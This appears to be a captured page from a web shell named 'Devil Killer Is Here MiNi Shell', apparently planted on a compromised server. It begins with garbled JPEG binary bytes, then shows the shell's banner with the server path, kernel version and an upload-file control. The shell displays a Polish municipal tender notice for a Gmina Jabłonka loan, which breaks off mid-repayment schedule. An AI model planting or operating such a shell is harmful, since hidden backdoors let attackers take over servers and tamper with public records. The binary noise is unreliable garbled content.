JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210914/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210914/0018035502-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Udzielenie i obsługa kredytu długoterminowego w łącznej kwocie 3.216.942,25 zł </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA JABŁONKA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 491892222</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. 3 Maja 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jabłonka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-480</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL219 - Nowotarski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 182-611-100</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@jablonka.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.jablonka.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Udzielenie i obsługa kredytu długoterminowego w łącznej kwocie 3.216.942,25 zł </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7038f955-1558-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00180355</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001701/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Udzielenie kredytu długoterminowego w wysokości 3792209,25 zł</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.jablonka.pl/index.php/zamowienia-publiczne-mainmenu-37/35-ogoszenia-o-przetargach/6306-rint-271-1-21-2021-udzielenie-i-obsluga-kredytu-dlugoterminowego-w-lacznej-kwocie-3-216-942-25-zl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1	W postępowaniu o udzielenie zamówienia komunikacja pomiędzy zamawiającym a wykonawca odbywa się przy użyciu następujących narzędzi:<br/>•	miniPortalu https://miniportal.uzp.gov.pl/, <br/>•	ePUAPu https://epuap.gov.pl/wps/portal <br/> Kontakt za pośrednictwem systemu ePUAP (w wyszukiwarce podmiotu należy wpisać "Urząd Gminy Jabłonka").<br/> Elektroniczna skrzynka podawcza/Identyfikator adresata: /29gw7qf1xt/skrytka<br/>•	poczty elektronicznej: sekretariat@jablonka.pl lub zpubliczne@jablonka.pl<br/>2	Zamawiający wyznacza do kontaktu z wykonawcami osoby wskazane w rozdziale 22 SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na platformie ePUAP. Wykonawca posiadający konto na platformie ePUAP ma dostęp<br/>do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>2. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z miniPortalu (https://miniportal.uzp.gov.pl) oraz<br/>Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>3. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia,<br/>zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.<br/>4. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP.<br/>5. Identyfikator postępowania dla danego postępowania o udzielenie zamówienia dostępne są na liście<br/>wszystkich postępowań na miniPortalu oraz stanowi załącznik nr 8 do niniejszej SWZ.<br/>6. Zamawiający przekazuje link do postępowania oraz ID postępowania jako załącznik nr 8 do<br/>niniejszej SWZ. Dane postępowanie można wyszukać również na Liście wszystkich postępowań klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania na<br/>miniPortalu</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">•	administratorem danych osobowych Wykonawcy jest Wójt Gminy Jabłonka, ul. 3 – go Maja 1, 34 – 480 Jabłonka;<br/>•	Kontakt z inspektorem ochrony danych osobowych w Gminie Jabłonka kontakt: e-mail: iod@jablonka.pl, telefon 18/2611100;<br/>•	dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego /dane identyfikujące postępowanie, np. nazwa, numer/ prowadzonym w trybie podstawowym bez przeprowadzenia negocjacji nr RINT.271.1.21.2021 „Udzielenie i obsługa kredytu długoterminowego w łącznej kwocie 3.216.942,25 zł z przeznaczeniem na finansowanie planowanego deficytu budżetu Gminy Jabłonka oraz spłatę wcześniej zaciągniętych kredytów i pożyczek”.<br/>Podstawę prawna przetwarzania danych osobowych stanowi ustawa Prawo zamówień publicznych, wydanych na jej podstawie akty wykonawcze, a także ustawa o narodowym zasobie archiwalnym i archiwach. <br/>•	odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2021 r. poz. 1129 z późn. zm.), dalej „ustawa Pzp”;<br/>•	dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały okres obowiązywania umowy lub dłuższym, jeżeli wynika to z odrębnych przepisów; Okresy te dotyczą również Wykonawców, którzy złożyli oferty i nie zostały one uznane, jako najkorzystniejsze (nie zawarto z tymi Wykonawcami umowy). <br/>•	obowiązek podania przez Wykonawcę danych osobowych bezpośrednio dotyczących Wykonawcy jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>•	w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>•	Wykonawca posiada:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Wykonawcy dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania danych osobowych Wykonawcy (Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego); <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie danych osobowych dotyczących Wykonawcy narusza przepisy RODO;<br/>•	nie przysługuje Wykonawcy:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RINT.271.1.21.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.1.	Część I kredyt w wysokości 1.078.564,00 zł (słownie: jeden milion siedemdziesiąt osiem tysięcy pięćset sześćdziesiąt cztery złote 00/100),z przeznaczeniem na finansowanie planowanego deficytu budżetu Gminy Jabłonka;<br/>2.1.1. Wypłata kredytu: kredyt będzie udzielony na rachunek Gminy Jabłonka w terminie do 31.12.2021 r. według zapotrzebowania Zamawiającego, w dowolnych terminach i transzach dostosowanych do potrzeb Zamawiającego na podstawie pisemnych dyspozycji Zamawiającego, z ostatecznym terminem wykorzystania kredytu do dnia 31.12.2021 r.<br/>2.1.2. Forma zabezpieczenia kredytu: weksel in blanco wraz z deklaracją wekslową z kontrasygnatą skarbnika. <br/>2.1.3. Oprocentowanie kredytu zmienne przez cały okres kredytowania – zmiana stopy procentowej następować będzie, co kwartał kalendarzowy wg stawki WIBOR 3M z ostatniego dnia miesiąca kończącego kwartał kalendarzowy, poprzedzający okres obrachunkowy, lub ostatniego dnia roboczego przed datą, jeżeli w danym dniu nie ma notowania, plus stała marża. W całym okresie kredytowania marża Wykonawcy pozostaje na niezmienionym poziomie.<br/>2.1.4. W celu porównania złożonych ofert zamawiający wskazuje do obliczeń stawkę WIBOR 3M – 0,21 z dnia 12 sierpnia 2021 roku, którą należy podać w Załączniku nr 1 do SWZ. <br/>2.1.5. Wyłącznie do wyliczenia ceny kredytu należy przyjąć datę 12 sierpnia 2021 (data przyjęta dla potrzeb złożenia oferty). <br/>2.1.6. Zamawiający przyjmuje sposób naliczania wartości odsetek stanowiący składnik całkowitego kosztu kredytowego zgodnie z Prawem Bankowym:<br/>1)	liczba dni odsetkowych rocznie: 365/366 w roku przestępnym<br/>2)	faktyczna liczba dni w miesiącu<br/>2.1.7. Odsetki naliczane będą za rzeczywistą liczbę dni wykorzystania kredytu. Spłata odsetek następować będzie, tylko od kwoty faktycznie uruchomionego kredytu, na podstawie dokumentów obciążeniowych.<br/>2.1.8. Odsetki naliczane będą od kwoty faktycznego zadłużenia, Bank nie będzie pobierać opłat i prowizji bankowych od zaangażowania kredytu tj. salda niewykorzystanej części kredytu<br/>2.2.	2.1.9. Kredyt w kwocie 1.078.564,00 zł (słownie: jeden milion siedemdziesiąt osiem tysięcy pięćset sześćdziesiąt cztery złote 00/100), z przeznaczeniem na finansowanie planowanego deficytu budżetu Gminy Jabłonka będzie spłacany przez okres 7 lat w ratach kwartalnych: <br/>•	w roku 2022 spłata 4 rat po 25.000,00 zł,<br/>•	w roku 2023 spłata 4 rat po 37.500,00 zł, <br/>•	w roku 2024 spłata 4 rat po 37.500,00 zł,<br/>•	w roku 2025 spłata 4 rat po 37.500,00 zł,<br/>•	w roku 2026 spłata 4 rat po 37.500,00 zł,<br/>•	w roku 2027 spłata 4 rat po 50.000,00 zł,<br/>•	w roku 2028 spłata 4 rat po 44.641,00 zł.<br/>2.1.10. Kredyt udzielony będzie na okres 7 lat z okresem spłaty rozpoczynającym się najpóźniej od 31 marca 2022 r.<br/>2.1.11. Ustala się okres karencji w spłacie kredytu do dnia 30.03.2022 roku.<br/>2.1.12. Zamawiający zastrzega sobie możliwość wcześniejszej spłaty bez ponoszenia dodatkowych opłat i prowizji. O terminie daty spłaty Zamawiający powiadomi pisemnie Wykonawcę w terminie 2 dni przed datą spłaty. (Powiadomienie zostanie doręczone osobiście, za pośrednictwem poczty elektronicznej bądź faksu).<br/>2.1.14. Zamawiający dopuszcza przy naliczaniu odsetek przyjęcie kalendarza rzeczywistego.<br/>2.1.15. W przypadku gdy termin zapłaty przypadnie na dzień wolny od pracy, uregulowanie należności nastąpi w pierwszym dniu roboczym po wyznaczonej dacie.<br/>2.1.16. Dzień podpisania umowy będzie dniem postawienia kredytu do dyspozycji Zamawiającego w terminach i transzach dostosowanych do potrzeb Zamawiającego na podstawie pisemnych dyspozycji Zamawiającego, z ostatecznym terminem wykorzystania kredytu do dnia 31.12.2021 r.<br/>2.1.17. Z tytułu przedterminowej spłaty części lub całości kredytu Wykonawca nie będzie pobierał dodatkowych opłat i prowizji.<br/>2.1.18. Jednorazowa prowizja bankowa zostanie pobrana w dniu spłaty pierwszej raty kredytu od kwoty wykorzystanego kredytu.<br/>2.1.19. Wykonawca nie będzie pobierać żadnych dodatkowych opłat i prowizji z tytułu udzielenia i obsługi kredytu poza wymienionymi w SWZ w załączniku Nr 1.<br/>2.1.20. Zamawiający zastrzega sobie prawo rezygnacji z zaciągnięcia kredytu bez żadnych konsekwencji finansowych.<br/>2.1.21. Zamawiający zastrzega sobie możliwość niewykorzystania całej kwoty kredytu bez ponoszenia z tego tytułu jakichkolwiek kosztów i bez wymaganej zgody Wykonawcy oraz konieczności sporządzenia aneksu <br/>2.1.22. Wszystkie materiały niezbędne do zbadania zdolności kredytowej znajdują się na stronie pod adresem http://www.jablonka.pl/index.php/zamowienia-publiczne-mainmenu-37/62-dokumenty-finansowe </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66113000-5 - Usługi udzielania kredytu</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2028-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający przy wyborze najkorzystniejszej oferty będzie kierował się następującymi kryteriami:<br/>Cena kredytu – całkowity koszt kredytu (Kc) – 100 pkt<br/>l.p.	Kryterium	Waga	Maksymalna liczba punktów jakie może otrzymać oferta za kryterium - Cena kredytu (koszt),<br/>1	Cena kredytu – cena kredytu (koszt), na którą składa się oprocentowanie liczone wg stawki WIBOR 3M z dnia 12.08.2021 r. powiększone o proponowaną marżę Wykonawcy)<br/>	100%	100 punktów<br/><br/>Wyłącznie do wyliczenia ceny kredytu należy przyjąć datę 15.10.2021 roku.<br/><br/>W przetargu zwycięży oferta, która w wyniku oceny otrzyma najwyższą liczbę punktów i spełni wszystkie wymogi zawarte w ustawie Prawo zamówień publicznych i Specyfikacji Istotnych Warunków Zamówienia. Jeżeli nie będzie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że zostały złożone oferty o takiej samej cenie, Zamawiający wezwie oferentów, którzy złożyli te oferty, do złożenia w wyznaczonym terminie ofert dodatkowych.<br/><br/>2.	Zasady przyznawania punktów dla poszczególnych kryteriów:<br/><br/>a)	Cena /Kc/ - kryterium temu przypisuje się wagę nie więcej niż 100 pkt.<br/><br/>Kryterium ceny dotyczy ceny brutto określonej w formularzu ofertowym, wyrażonej w złotych polskich.<br/>Liczba punktów jaką otrzyma każda z ofert zostanie ustalona w następujący sposób:<br/>-	oferta, która zawiera najniższą cenę otrzyma maksymalną liczbę punktów przewidzianą dla tego kryterium (100 pkt)<br/>-	ilość punktów jaką otrzymają pozostałe oferty zostanie ustalona wg wzoru:<br/><br/><br/><br/>Gdzie:<br/>Kc - ilość punktów przyznanych Wykonawcy <br/>Cn - najniższa zaoferowana cena oferty brutto, spośród wszystkich ofert nie podlegających odrzuceniu <br/>Cb – cena oferty brutto zaoferowana w ofercie badanej <br/><br/>3. Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie najwyższą liczbę punktów <br/>4.	Zamawiający udzieli zamówienia Wykonawcy, który uzyska najwyższą liczbę punktów.<br/>5.	Ocena ofert dokonywana będzie z dokładnością do dwóch miejsc po przecinku</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II - kredyt w wysokości 2.138.378,25 zł (słownie: dwa miliony sto trzydzieści osiem tysięcy trzysta siedemdziesiąt osiem złotych 25/100 ), z przeznaczeniem na spłatę wcześniej zaciągniętych kredytów i pożyczek <br/>2.2.1. Przedmiotem zamówienia jest udzielenie i obsługa kredytu długoterminowego w kwocie 2.138.378,25 zł (słownie: dwa miliony sto trzydzieści osiem tysięcy trzysta siedemdziesiąt osiem złotych 25/100), z przeznaczeniem na spłatę wcześniej zaciągniętych kredytów i pożyczek.<br/>2.2.2. Wypłata kredytu: kredyt będzie udzielony na rachunek Gminy Jabłonka w terminie do 31.12.2021 r. według zapotrzebowania Zamawiającego, w dowolnych terminach i transzach dostosowanych do potrzeb Zamawiającego na podstawie pisemnych dyspozycji Zamawiającego, z ostatecznym terminem wykorzystania kredytu do dnia 31.12.2021 r.<br/>2.2.3. Forma zabezpieczenia kredytu: weksel in blanco wraz z deklaracją wekslową z kontrasygnatą skarbnika. <br/>2.2.4. Oprocentowanie kredytu zmienne przez cały okres kredytowania – zmiana stopy procentowej następować będzie, co kwartał kalendarzowy wg stawki WIBOR 3M z ostatniego dnia miesiąca kończącego kwartał kalendarzowy, poprzedzający okres obrachunkowy, lub ostatniego dnia roboczego przed datą, jeżeli w danym dniu nie ma notowania, plus stała marża. W całym okresie kredytowania marża Wykonawcy pozostaje na niezmienionym poziomie.<br/>2.2.5. W celu porównania złożonych ofert zamawiający wskazuje do obliczeń stawkę WIBOR 3M – 0,21 z dnia 12 sierpnia 2021 roku, którą należy podać w Załączniku nr 1 do SIWZ. <br/>2.2.6. Wyłącznie do wyliczenia ceny kredytu należy przyjąć datę 12 sierpień 2021 (data przyjęta dla potrzeb złożenia oferty). <br/>2.2.7. Zamawiający przyjmuje sposób naliczania wartości odsetek stanowiący składnik całkowitego kosztu kredytowego zgodnie z Prawem Bankowym:<br/>1)	liczba dni odsetkowych rocznie: 365/366 w roku przestępnym<br/>2)	faktyczna liczba dni w miesiącu<br/>2.2.8. Odsetki naliczane będą za rzeczywistą liczbę dni wykorzystania kredytu. Spłata odsetek następować będzie, tylko od kwoty faktycznie uruchomionego kredytu, na podstawie dokumentów obciążeniowych.<br/>2.2.9. Odsetki naliczane będą od kwoty faktycznego zadłużenia, Bank nie będzie pobierać opłat i prowizji bankowych od zaangażowania kredytu tj. salda niewykorzystanej części kredytu<br/>2.2.10. Kredyt w kwocie 2.138.378,25 zł (słownie: dwa miliony sto trzydzieści osiem tysięcy trzysta siedemdziesiąt osiem złotych 25/100), z przeznaczeniem na spłatę wcześniej zaciągniętych kredytów i pożyczek będzie spłacany przez okres 7 lat w ratach kwartalnych: <br/>•	w roku 2022 spłata 3 rat po 43.868,00 zł oraz 1 rata w wysokości 43.868,49 zł,<br/>•	w roku 2023 spłata 3 rat po 68.436,00 zł oraz 1 rata w wysokości 68.437,00 zł,<br/>•	w roku 2024 spłata 